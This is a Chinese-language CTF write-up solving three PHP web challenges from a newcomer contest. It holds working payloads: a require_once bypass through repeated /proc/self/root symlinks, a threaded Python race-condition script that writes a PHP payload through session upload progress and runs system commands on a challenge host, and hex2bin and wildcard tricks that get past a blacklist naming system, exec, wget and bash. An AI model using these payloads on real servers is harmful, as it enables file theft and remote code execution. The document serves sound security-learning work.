以为迎新赛比较简单,谁知一点也不简单,也可能是我太菜了。正好借这次比赛可以学到很多东西。
题目代码很简便,一看就知道是文件包含。
题目核心就是这个require_once函数。它与require一样都是包含函数,作用和语法也基本相同,唯一的区别就是php会检查该文件是否已经被包含过,如果该文件被包含过,则不会再次包含。这是这题最头疼的地方,用伪协议读取不出来可以说明该文件已经被包含了。那么接下来就要绕过该限制了。
php的包含机制就是将已包含的文件和文件的真实路径放进哈希表中。(哈希表是一种非常重要的数据结构,大部分语言特性就是基于哈希表实现的,如变量的作用域,函数,类的属性都存放在哈希表中)
php最新版的小提示
require_once包含的软连接层数较多时,once 的 hash 匹配会直接失效造成重复包含。
当然,要彻底搞懂其中的缘由看这篇文章php源码分析 require_once 绕过不能重复包含文件的限制 - 安全客,安全资讯平台
软链接是什么?也被称为符号链接。存放另一个文件的路径的形式存在,可以对一个不存在的文件名进行链接,可以对目录进行链接。
先看payload
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
同样也是用filter读取,但是多了很多/proc/self/root 这又是个什么东西呢?
这里有个小知识点
/proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接
那么我们可以就利用多级符号链接来绕过不能重复包含的限制了。
非预期解,但也要了解一下。在php5.4.0后提供了一个用于检测上传进度的功能。先看一下手册吧
这个检测上传功能的作用本身对上传没什么作用,它会发送post请求来检查状态(创建临时会话),我们可以利用post请求写入webshell。(在post传数据时,需要带上PHP_SESSION_UPLOAD_PROGRESS这个字段,php就会自动启用session)
当session.use_strict_mode默认值为0,用户可以自定义sessionid的。比如在cookie中写入PHPSESSID=flag,php将会在服务器上创建一个文件:/tmp/sess_flag。
如果我们知道session文件的路径
文件名可控
内容可以通过PHP_SESSION_UPLOAD_PROGRESS写入的
那么有文件包含的话,就可以getshell了。
一般来说session.upload_progress.cleanup是默认开启的,它会清除所有的session文件,所以要利用条件竞争。相关链接:PHP Session.upload_progress - chalan630 - 博客园 (cnblogs.com)
附上大佬脚本
import io
import requests
import threading
sessid = 'bbbbbbb'
data = {"cmd":"system('cat flag.php');"}
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post( 'http://e3570b6b-a823-4161-b120-1d9f6fdbf74e.node4.buuoj.cn:81/', data={'PHP_SESSION_UPLOAD_PROGRESS': ''}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
while True:
resp = session.post('http://e3570b6b-a823-4161-b120-1d9f6fdbf74e.node4.buuoj.cn:81/?file=/tmp/sess_'+sessid,data=data)
if '1.txt' in resp.text:
print(resp.text)
event.clear()
else:
print("[+++++++++++++]retry")
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,30):
threading.Thread(target=write,args=(session,)).start()
for i in range(1,30):
threading.Thread(target=read,args=(session,)).start()
event.set()
题目代码
"24") or ($timme > "31") or ($timmme > "60")){
echo $fl4g;
}else{
echo "Try harder!";
}
set_error_handler(
function() use(&$fl4g) {
print $fl4g;
}
);
$fl4g .= $dest0g3;
?>
php的data函数是把时间戳格式化为更好的日期和时间。H表示小时,d表示一个月内的天数,i表示分钟数,知道这些就知道那个if语句压根就不成立,从if语句里读出flag是不可能的了。那么就只能从set_error_handler函数入手了。这个函数是设置用户自定义的错误处理函数。
.=运算符会拼接字符串,当我们传入一个数组并且拼接,就会报错,从而触发报错函数,打印出flag。 所以payload:
?ctf[]=123
','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>
很纯粹的命令执行,过滤掉了非常多的东西。可以用十六进制进行绕过。因为hex2bin没有被过滤掉。system的十六进制是73797374656d 查看文件的命令都被过滤光了,一个新的命令uniq
uniq 可检查文本文件中重复出现的行列。payload:
aaa=hex2bin('73797374656d')('uniq /fla*');
另一种解法:cat命令的路径为/bin/cat,因为cat被过滤了,可以用正则绕过。(写路径是因为他会在该bin目录下正则匹配)payload:
aaa=hex2bin('73797374656D')('/bin/ca? /fla?');
这个比赛的web题很多,绝不会仅仅复现这三道题。